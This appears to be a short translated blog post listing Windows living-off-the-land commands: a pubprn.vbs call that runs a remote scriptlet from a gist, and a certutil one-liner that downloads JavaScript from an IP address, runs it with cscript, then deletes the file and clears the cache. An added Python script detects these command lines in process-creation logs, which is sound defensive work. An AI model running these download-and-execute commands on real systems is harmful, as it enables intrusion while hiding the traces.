Another way to execute an SCT file remotely
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
Details: https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd
Command-line download, method 1
Command-line download, method 2
Clear the cache: certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete
Executing remote JS from the command line
certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js && del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
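Added example, not part of the original post: detection logic in Python that flags the command lines shown above when they appear in process-creation logs (for example Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled). The rule names, the example.invalid URL and the benign sample lines are constructed for illustration.

```python
import re

URL = r"https?://\S+"
CERTUTIL = r"\bcertutil(?:\.exe)?\s.*[-/]urlcache\b.*"
# Rule names are labels made up for this example.
RULES = {
    # pubprn.vbs given a script: moniker that points at a remote scriptlet
    "pubprn_remote_scriptlet": re.compile(
        r"pubprn\.vbs\s+\S+\s+script:\s*" + URL, re.I),
    # certutil -urlcache ... <url> delete   (cache entry removal)
    "certutil_cache_delete": re.compile(
        CERTUTIL + URL + r"\s+delete\s*$", re.I),
    # certutil -urlcache ... <url> [outfile]   (file retrieval)
    "certutil_download": re.compile(
        CERTUTIL + URL + r"(?:\s+(?!delete\b)(?P<out>\S+))?\s*$", re.I),
}
SCRIPT_HOST = re.compile(
    r"\b[cw]script(?:\.exe)?\s+(?:/\S+\s+)*(?P<file>\S+)", re.I)

def analyze(command_line):
    """Return the sorted rule names that fire for one logged command line."""
    hits, fetched = set(), set()
    # cmd.exe chains ("a && b") are logged as one line; judge each part.
    for part in re.split(r"\s+&&?\s+", command_line.strip()):
        for name, rx in RULES.items():
            m = rx.search(part)
            if m:
                hits.add(name)
                out = m.groupdict().get("out")
                if out:
                    fetched.add(out.lower())
        # A script host run on a file fetched earlier in the same chain.
        m = SCRIPT_HOST.search(part)
        if m and m.group("file").lower() in fetched:
            hits.add("download_then_script_host")
    return sorted(hits)

# Sample log lines: the certutil lines are the ones on this page, the
# pubprn line uses a constructed URL, the last two are constructed benign use.
SAMPLES = [
    r"cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://example.invalid/test.sct",
    "certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js && del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete",
    r"certutil -verify C:\certs\server.cer",
    r"cscript //nologo C:\scripts\inventory.vbs",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line[:60])
```

Chains written without spaces around the separator are not split by this example and are evaluated as a single command.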
Original article: https://www.cnblogs.com/nul1/p/8973337.html